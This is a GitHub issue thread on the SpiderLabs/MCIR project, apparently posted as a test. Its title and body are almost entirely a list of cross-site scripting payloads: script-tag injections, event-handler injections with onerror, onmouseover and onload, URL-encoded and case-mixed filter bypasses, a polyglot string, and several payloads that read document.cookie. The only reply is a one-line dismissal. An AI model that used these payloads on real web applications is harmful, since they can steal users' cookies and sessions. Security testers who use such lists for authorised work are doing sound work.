### ISSUE TITLE
http://x.com/"onmouseover="alert(document.domain)

### ISSUE THREAD

**Issue by jubabaghdad** [SpiderLabs/MCIR#5]
<script>alert("xss")</script>

<script>alert(String.fromCharCode(74, 117, 98, 97, 66, 97, 103, 104, 100, 97, 100, 58, 41));</script>

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

<sCrIpT>alert('JubaBaghdad^_^');</ScRiPt>

<sCrIpT>alert(document.cookie);</ScRiPt>

"><script>alert("xss")</script>

<ScRipT>prompt("xss);</ScRipT>
a

" onmouseover=alert(1)//

onmouseover="alert('xss')"

onmouseover=prompt(document.domain)

"/></p><svg/onload=prompt(document.domain)>

</title></script/"-alert(0)-"-->"><s vg/onload=prompt(/OPENBUGBOUNTY/)>

†‡•＜img src=a onerror=javascript:alert('hacked')>

javascript://%0a%0dalert(document.cookie)

%ff/'/src='data:text/html;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='?"></script><script/xxxx='

<!'/*"/*/'/*/"/*--></Script><Image Srcset=K */; Onerror=confirm`1` //>

===========================================

"><img src="x" onerror=prompt("xss") "

"><img src=x onerror=prompt(document.domain)>

#!"><img src=x onerror=prompt(document.domain)>

h/<\i<script>alert("s");</script>

' onerror='alert(1)';

Type here"><input type=submit formaction="javascript&colon;this&lsqb;'a'&plus;'lert'&rsqb;`1`"

""--!><Script /K/>confirm(1)</Script> /k/>#

<a href=[javascript&':alert(1)']>test</a>

&lt;img src=x onerror=prompt(1)&gt;

&quote;&gt;&lt;img src=x onerror=confirm(1);&gt;

http://x.com/"onmouseover="alert(document.domain)

// # "><svg/onload=prompt(1)>

flashmediaelement.swf?jsinitfunctio%gn=alert`OPENBUGBOUNTY`

**Comment by unicornsasfuel** [comment]
<blink>nope</blink>
